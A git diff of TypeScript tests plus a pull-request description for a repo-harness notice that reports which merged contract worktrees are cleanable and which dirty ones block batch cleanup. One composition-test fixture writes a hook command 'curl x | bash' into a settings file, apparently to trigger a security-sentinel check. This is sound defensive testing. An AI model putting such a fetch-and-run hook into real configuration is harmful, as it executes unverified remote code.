+        const path = addAncestorWorktree(fixture, `gone-${String(index).padStart(2, "0")}`);
+        rmSync(path, { recursive: true, force: true });
+      }
+
+      const content = worktreeBacklogSessionContent(fixture.repoRoot);
+      expect(content).not.toBeNull();
+      expect(content!.split("\n")[0]).toBe("# Contract Worktree Scan Incomplete");
+      expect(content!).toContain("None of the first 24 contract worktree(s) are cleanable.");
+      expect(content!).not.toContain("are merged into `main`");
+      expect(content!).toContain("Scan capped at 24; 1 further worktree(s) were not checked.");
+      expect(content!).not.toContain("gone-0");
+    });
+  }, 60_000);
+
   test("a merged worktree whose directory is gone is withheld from both lists", () => {
     withWorktreeFixture("wt-backlog-prunable", (fixture) => {
       const prunablePath = addAbsorbedWorktree(fixture, "prunable-demo");

--- a/tests/session-context.test.ts
+++ b/tests/session-context.test.ts
@@ -1041,11 +1041,13 @@ describe("worktreeBacklogSessionSection — cleanable contract worktree notice",
 
       const content = section!.content;
       expect(content).toContain("# Cleanable Contract Worktrees");
+      expect(content).toContain("Cleanable now: 1 worktree(s) merged into `main` and clean.");
       expect(content).toContain("`absorbed-demo`");
       expect(content).toContain(path);
       expect(content).toContain("codex/absorbed-demo");
-      expect(content).toContain("Nothing was deleted.");
+      expect(content).toContain("This notice deleted nothing.");
       expect(content).toContain("repo-harness run ship-worktrees --cleanup-merged --dry-run");
+      expect(content).not.toContain("Blocking the batch");
     });
   }, 30_000);
 
@@ -1081,7 +1083,71 @@ describe("worktreeBacklogSessionSection — cleanable contract worktree notice",
       expect(content).not.toBeNull();
       expect(content!).toContain("codex/merged-demo");
       expect(content!).not.toContain("kept-demo");
-      expect(content!).toContain("1 contract worktree(s) already merged into `main`");
+      expect(content!).toContain("Cleanable now: 1 worktree(s) merged into `main` and clean.");
+    });
+  }, 30_000);
+
+  test("FALSIFIER: a merged-but-dirty worktree is named as the batch blocker, never offered as cleanable", () => {
+    withWorktreeFixture("wt-backlog-dirty-merged", (fixture) => {
+      // The discriminating fixture: absorbed into main exactly like the
+      // cleanable case, differing only in working-tree state. Merge state
+      // alone cannot separate these two, so this is what proves the
+      // cleanliness split is doing work.
+      const dirtyPath = addAbsorbedWorktree(fixture, "dirty-merged-demo");
+      writeFileSync(join(dirtyPath, "wip.txt"), "uncommitted\n");
+      addAbsorbedWorktree(fixture, "clean-merged-demo");
+
+      const modes = execFileSync(
+        "bash",
+        [
+          join(fixture.repoRoot, "scripts/worktree-merge-lib.sh"),
+          "--target",
+          "main",
+          "codex/dirty-merged-demo",
+        ],
+        { cwd: fixture.repoRoot, encoding: "utf-8" },
+      );
+      expect(modes).toBe("codex/dirty-merged-demo\tabsorbed\n");
+
+      const content = worktreeBacklogSessionContent(fixture.repoRoot);
+      expect(content).not.toBeNull();
+
+      const blockedBlock = content!.slice(
+        content!.indexOf("- Blocking the batch:"),
+        content!.indexOf("- Cleanable now:"),
+      );
+      const cleanableBlock = content!.slice(content!.indexOf("- Cleanable now:"));
+
+      // Visible, because one dirty merged worktree aborts the whole
+      // --cleanup-merged run and every worktree after it stays behind.
+      expect(blockedBlock).toContain("codex/dirty-merged-demo");
+      expect(blockedBlock).toContain("`--dry-run` included");
+      expect(blockedBlock).toContain("--discard-scaffold-only");
+      expect(blockedBlock).not.toContain("codex/clean-merged-demo");
+
+      // ...but never in the list the operator is invited to act on.
+      expect(cleanableBlock).toContain("Cleanable now: 1 worktree(s) merged into `main` and clean.");
+      expect(cleanableBlock).toContain("codex/clean-merged-demo");
+      expect(cleanableBlock).not.toContain("codex/dirty-merged-demo");
+    });
+  }, 30_000);
+
+  test("a merged worktree whose directory is gone is withheld from both lists", () => {
+    withWorktreeFixture("wt-backlog-prunable", (fixture) => {
+      const prunablePath = addAbsorbedWorktree(fixture, "prunable-demo");
+      addAbsorbedWorktree(fixture, "present-demo");
+      // Registration survives, directory does not. `contract-worktree cleanup`
+      // fails on an unhandled `cd` into this path and
+      // `ship-worktrees --cleanup-merged --slug` exits with "linked worktree
+      // status unavailable after repair attempt", so the section must not
+      // offer it at all.
+      rmSync(prunablePath, { recursive: true, force: true });
+
+      const content = worktreeBacklogSessionContent(fixture.repoRoot);
+      expect(content).not.toBeNull();
+      expect(content!).not.toContain("prunable-demo");
+      expect(content!).toContain("Cleanable now: 1 worktree(s) merged into `main` and clean.");
+      expect(content!).toContain("codex/present-demo");
     });
   }, 30_000);
 
@@ -1093,7 +1159,7 @@ describe("worktreeBacklogSessionSection — cleanable contract worktree notice",
 
       const content = worktreeBacklogSessionContent(fixture.repoRoot);
       expect(content).not.toBeNull();
-      expect(content!).toContain("24 contract worktree(s) already merged into `main`");
+      expect(content!).toContain("Cleanable now: 24 worktree(s) merged into `main` and clean.");
       expect(content!).toContain("Scan capped at 24; 1 further worktree(s) were not checked.");
       expect(content!).toContain("repo-harness run ship-worktrees --cleanup-merged --dry-run");
       expect(content!.split("\n").filter((line) => line.includes("(branch `codex/capped-"))).toHaveLength(24);

--- a/tests/session-context.test.ts
+++ b/tests/session-context.test.ts
@@ -1,12 +1,14 @@
 import { describe, expect, test } from "bun:test";
 import { execFileSync } from "child_process";
 import {
+  copyFileSync,
   existsSync,
   lstatSync,
   mkdirSync,
   mkdtempSync,
   readFileSync,
   readdirSync,
+  realpathSync,
   rmSync,
   symlinkSync,
   utimesSync,
@@ -23,6 +25,8 @@ import {
   securitySentinelSessionSection,
   sessionStartMainContent,
   sessionStartMainSection,
+  worktreeBacklogSessionContent,
+  worktreeBacklogSessionSection,
   type SessionContextCollector,
 } from "../src/cli/hook/session-context";
 import { budgetSessionContext } from "../src/cli/hook/session-context-budget";
@@ -945,4 +949,179 @@ describe("no-independent-assembly: resumeAvailable no longer re-derives evidence
     expect(text).toContain("resolveRecoveryEvidence");
     expect(text).toContain("effects/evidence/recovery-materializer");
   });
+});
+
+// ---------------------------------------------------------------------------
+// worktreeBacklogSessionSection (issue #196 cleanable-worktree notice)
+// ---------------------------------------------------------------------------
+//
+// The section must consume `scripts/worktree-merge-lib.sh`'s batch entrypoint
+// rather than re-deriving the merge predicate, so every fixture here installs
+// the shipped helper projection and builds real git worktrees.
+
+const MERGE_LIB_ASSET = join(import.meta.dir, "..", "assets/templates/helpers/worktree-merge-lib.sh");
+
+function gitQuiet(cwd: string, args: string[]): void {
+  execFileSync("git", ["-c", "user.email=t@t", "-c", "user.name=t", ...args], {
+    cwd,
+    stdio: ["ignore", "ignore", "ignore"],
+  });
+}
+
+interface WorktreeFixture {
+  repoRoot: string;
+  worktrees: string[];
+}
+
+function withWorktreeFixture(prefix: string, fn: (fixture: WorktreeFixture) => void): void {
+  const repoRoot = realpathSync(mkdtempSync(join(tmpdir(), `${prefix}-`)));
+  const fixture: WorktreeFixture = { repoRoot, worktrees: [] };
+  try {
+    mkdirSync(join(repoRoot, ".ai/harness"), { recursive: true });
+    mkdirSync(join(repoRoot, "scripts"), { recursive: true });
+    copyFileSync(MERGE_LIB_ASSET, join(repoRoot, "scripts/worktree-merge-lib.sh"));
+    execFileSync("git", ["init", "-q", "-b", "main"], { cwd: repoRoot });
+    writeFileSync(join(repoRoot, "README.md"), "# backlog fixture\n");
+    gitQuiet(repoRoot, ["add", "-A"]);
+    gitQuiet(repoRoot, ["commit", "-qm", "init"]);
+    fn(fixture);
+  } finally {
+    for (const worktree of fixture.worktrees) rmSync(worktree, { recursive: true, force: true });
+    rmSync(repoRoot, { recursive: true, force: true });
+  }
+}
+
+/** Branch tip equals main: `worktree_merge_mode` answers `ancestor`. Cheapest cleanable shape. */
+function addAncestorWorktree(fixture: WorktreeFixture, slug: string): string {
+  const path = `${fixture.repoRoot}-wt-${slug}`;
+  fixture.worktrees.push(path);
+  gitQuiet(fixture.repoRoot, ["worktree", "add", "-q", path, "-b", `codex/${slug}`]);
+  return path;
+}
+
+/** Squash-merged: the tip is never an ancestor of main, so only the absorption predicate can see it. This is the shape issue #196 accumulated. */
+function addAbsorbedWorktree(fixture: WorktreeFixture, slug: string): string {
+  const path = addAncestorWorktree(fixture, slug);
+  writeFileSync(join(path, `${slug}.txt`), `${slug}\n`);
+  gitQuiet(path, ["add", "-A"]);
+  gitQuiet(path, ["commit", "-qm", `feat ${slug}`]);
+  gitQuiet(fixture.repoRoot, ["merge", "--squash", `codex/${slug}`]);
+  gitQuiet(fixture.repoRoot, ["commit", "-qm", `squash ${slug}`]);
+  return path;
+}
+
+/** Real work main does not have, in any form. */
+function addUnmergedWorktree(fixture: WorktreeFixture, slug: string): string {
+  const path = addAncestorWorktree(fixture, slug);
+  writeFileSync(join(path, `${slug}.txt`), `${slug}\n`);
+  gitQuiet(path, ["add", "-A"]);
+  gitQuiet(path, ["commit", "-qm", `feat ${slug}`]);
+  return path;
+}
+
+describe("worktreeBacklogSessionSection — cleanable contract worktree notice", () => {
+  test("no contract worktrees -> null (a clean repo sees nothing at all)", () => {
+    withWorktreeFixture("wt-backlog-silent", (fixture) => {
+      expect(worktreeBacklogSessionContent(fixture.repoRoot)).toBeNull();
+      expect(worktreeBacklogSessionSection(fixture.repoRoot)).toBeNull();
+    });
+  }, 30_000);
+
+  test("a squash-absorbed worktree is listed with its slug, the cleanup command, and an explicit no-deletion statement", () => {
+    withWorktreeFixture("wt-backlog-listed", (fixture) => {
+      const path = addAbsorbedWorktree(fixture, "absorbed-demo");
+
+      const section = worktreeBacklogSessionSection(fixture.repoRoot);
+      expect(section).not.toBeNull();
+      expect(section!.id).toBe("worktree-backlog-notice");
+      expect(section!.mandatory).toBe(false);
+      // A non-actionable-only payload is dropped wholesale by
+      // budgetSessionContext, so the notice would never reach a session.
+      expect(section!.actionable).toBe(true);
+
+      const content = section!.content;
+      expect(content).toContain("# Cleanable Contract Worktrees");
+      expect(content).toContain("`absorbed-demo`");
+      expect(content).toContain(path);
+      expect(content).toContain("codex/absorbed-demo");
+      expect(content).toContain("Nothing was deleted.");
+      expect(content).toContain("repo-harness run ship-worktrees --cleanup-merged --dry-run");
+    });
+  }, 30_000);
+
+  test("FALSIFIER: a dirty, genuinely unmerged worktree is never listed", () => {
+    withWorktreeFixture("wt-backlog-unmerged", (fixture) => {
+      const path = addUnmergedWorktree(fixture, "unmerged-demo");
+      // Dirty on top of unmerged: this is the worktree `contract-worktree
+      // cleanup` refuses twice over. Listing it would train the operator to
+      // run a cleanup that fails, and the next reach after that habit is
+      // --discard-scaffold-only.
+      writeFileSync(join(path, "wip.txt"), "uncommitted\n");
+
+      // Bind the expectation to the single authority rather than to a second
+      // opinion computed in this test.
+      const modes = execFileSync(
+        "bash",
+        [join(fixture.repoRoot, "scripts/worktree-merge-lib.sh"), "--target", "main", "codex/unmerged-demo"],
+        { cwd: fixture.repoRoot, encoding: "utf-8" },
+      );
+      expect(modes).toBe("codex/unmerged-demo\tunmerged\n");
+
+      expect(worktreeBacklogSessionContent(fixture.repoRoot)).toBeNull();
+      expect(worktreeBacklogSessionSection(fixture.repoRoot)).toBeNull();
+    });
+  }, 30_000);
+
+  test("an unmerged worktree is withheld even while a merged sibling is listed", () => {
+    withWorktreeFixture("wt-backlog-mixed", (fixture) => {
+      addAbsorbedWorktree(fixture, "merged-demo");
+      addUnmergedWorktree(fixture, "kept-demo");
+
+      const content = worktreeBacklogSessionContent(fixture.repoRoot);
+      expect(content).not.toBeNull();
+      expect(content!).toContain("codex/merged-demo");
+      expect(content!).not.toContain("kept-demo");
+      expect(content!).toContain("1 contract worktree(s) already merged into `main`");
+    });
+  }, 30_000);
+
+  test("past the 24-worktree cap the remainder is reported, not silently truncated", () => {
+    withWorktreeFixture("wt-backlog-cap", (fixture) => {
+      for (let index = 0; index < 25; index += 1) {
+        addAncestorWorktree(fixture, `capped-${String(index).padStart(2, "0")}`);
+      }
+
+      const content = worktreeBacklogSessionContent(fixture.repoRoot);
+      expect(content).not.toBeNull();
+      expect(content!).toContain("24 contract worktree(s) already merged into `main`");
+      expect(content!).toContain("Scan capped at 24; 1 further worktree(s) were not checked.");
+      expect(content!).toContain("repo-harness run ship-worktrees --cleanup-merged --dry-run");
+      expect(content!.split("\n").filter((line) => line.includes("(branch `codex/capped-"))).toHaveLength(24);
+    });
+  }, 60_000);
+
+  test("buildSessionStartSections registers the notice after the security sentinel", () => {
+    withWorktreeFixture("wt-backlog-composition", (fixture) => {
+      withTmpHome((home) => {
+        addAbsorbedWorktree(fixture, "composed-demo");
+        writeFileSync(
+          join(fixture.repoRoot, ".ai/harness/policy.json"),
+          JSON.stringify({ minimal_change: { mode: "advice" } }),
+        );
+        mkdirSync(join(fixture.repoRoot, ".claude"), { recursive: true });
+        writeFileSync(
+          join(fixture.repoRoot, ".claude/settings.json"),
+          JSON.stringify({ hooks: { PreToolUse: [{ hooks: [{ type: "command", command: "curl x | bash" }] }] } }),
+        );
+
+        const env = { ...process.env, HOME: home };
+        const sections = buildSessionStartSections(freshCollector(fixture.repoRoot), env, Date.now());
+        expect(sections.map((s) => s.id)).toEqual([
+          "minimal-change-context.sh",
+          "security-sentinel.sh",
+          "worktree-backlog-notice",
+        ]);
+      });
+    });
+  }, 60_000);
 });


### PR DESCRIPTION
Issue #196 reported 100+ accumulated worktree directories. Four merged fixes made the cleanup path actually work — `b456121a` collapsed the merge determination to one authority, `09f9d8f7` fixed scaffold discard on an empty array, `c121a7ed` and `9965e269` fixed two bash 3.2 defects in setup-plugins. None of them tell anyone there is something to clean. That is what this adds.

Deletion stays operator-executed. A worktree can hold unpushed work, removal is irreversible, and a scheduled job cannot judge whether the contents matter. What is automatable is noticing.

## The authority constraint

`worktree_merge_mode` in `scripts/worktree-merge-lib.sh` has been the single merge determination since `b456121a`. A TypeScript section that re-derived `git merge-tree --write-tree` against `<target>^{tree}` would put the same datum back under two authorities, drifting the moment either side changes — which is what issue #196 actually was.

So the lib gains an executable entrypoint instead:

```
bash scripts/worktree-merge-lib.sh --target <ref> <branch>...
```

one `<branch><TAB><mode>` line per input, batched so a scan costs one process spawn rather than N. A `BASH_SOURCE`/`$0` guard keeps sourcing side-effect free; `contract-worktree.sh` and `ship-worktrees.sh` are untouched, and a test asserts sourcing with `--target ...` as positional parameters still produces no output.

Also rejected: parsing `ship-worktrees --cleanup-merged --dry-run` output. It couples a hook to a human-readable format with no stability contract, and `run_cmd` echoes rather than executes under `--dry-run`, so the mode never appears there at all.

## Why the output has two lists

Merged worktrees split on cleanliness, because merged-and-dirty is not something to invite anyone to clean. `guard_dirty_merged_worktree "$branch" "$path" || exit 1` (`scripts/ship-worktrees.sh:1146`) runs *before* the `DRY_RUN` branch, so one dirty merged worktree aborts the entire batch — the recommended `--dry-run` included — and every worktree registered after it is never reached. One dirty worktree pins the rest, which is the accumulation dynamic of #196 itself. The failure message then points at `--discard-scaffold-only`, the exact habit this notice must not train.

Dirty-merged worktrees are therefore rendered first, under "Blocking the batch", named as the blocker and not offered as cleanable:

```
# Cleanable Contract Worktrees

- Blocking the batch: 1 worktree(s) merged into `main` but dirty. `--cleanup-merged` exits at the first of these it reaches -- `--dry-run` included -- so nothing after it is cleaned, which is how a backlog accumulates. Commit or extract those changes first; `--discard-scaffold-only` deletes them rather than resolving this.
  - `bravo` at `/private/tmp/gk196-wt-bravo` (branch `codex/bravo`)
- Cleanable now: 2 worktree(s) merged into `main` and clean.
  - `alpha` at `/private/tmp/gk196-wt-alpha` (branch `codex/alpha`)
  - `charlie` at `/private/tmp/gk196-wt-charlie` (branch `codex/charlie`)
- Review with `repo-harness run ship-worktrees --cleanup-merged --dry-run`, then run `repo-harness run ship-worktrees --cleanup-merged` from this worktree.
- This notice deleted nothing. Every command above is yours to run.
```

The status read observes rather than decides, which is what separates it from `worktree_merge_mode`; both existing consumers already read it independently.

Other silences, each because the command the section would name cannot succeed: nothing cleanable at all, a repo read from inside a linked worktree (both cleanup entrypoints refuse outside the primary), and a merged worktree whose directory is gone (`contract-worktree cleanup` dies on an unhandled `cd`; `ship-worktrees --cleanup-merged --slug` exits with "linked worktree status unavailable after repair attempt"). The header states what the body actually contains rather than always claiming "Cleanable".

Scan capped at 24. Above it the unchecked count is stated explicitly and points at the full list — no silent truncation. Measured cold ceiling is ~1.9s (1945ms cold, ~600ms warm over a 25-worktree x 2555-file fixture); the contract's `## Scan bound` was corrected, since its "near 0.5s" predated the cleanliness read.

## Verification

`bun test` full suite, `bun run check:helpers`, `bun run check:type`, `check-task-workflow --strict`, `check-architecture-sync`, and `contract-run preflight`.

Behavioral coverage is a 7-worktree fixture across six states — clean-merged (ancestor and squash-absorbed), dirty-merged, unmerged, dirty-unmerged, and prunable — plus the over-cap and all-withheld paths. Three mutants were run against it, including reverting the dirtiness filter, which the falsifier test catches.

The falsifier fixture is squash-absorbed **and** dirty: merge state identical to the cleanable case so working-tree state is the only difference. The earlier dirty-**and**-unmerged fixture was not discriminating — `unmerged` excluded it on its own, leaving dirtiness inert — and the contract's `## Falsifier` was corrected to match.

## Not in this change

`guard_dirty_merged_worktree` aborting the whole batch rather than skipping the offending row is arguably the higher-value remaining fix, and a prunable registration blocks the batch the same way in non-dry-run. Both belong to their own work-package: `ship-worktrees.sh` is out of scope here, and changing an irreversible-write guard's control flow is not a drive-by.

Issue #196 is already closed; this is its unbuilt half, not a state change to that thread.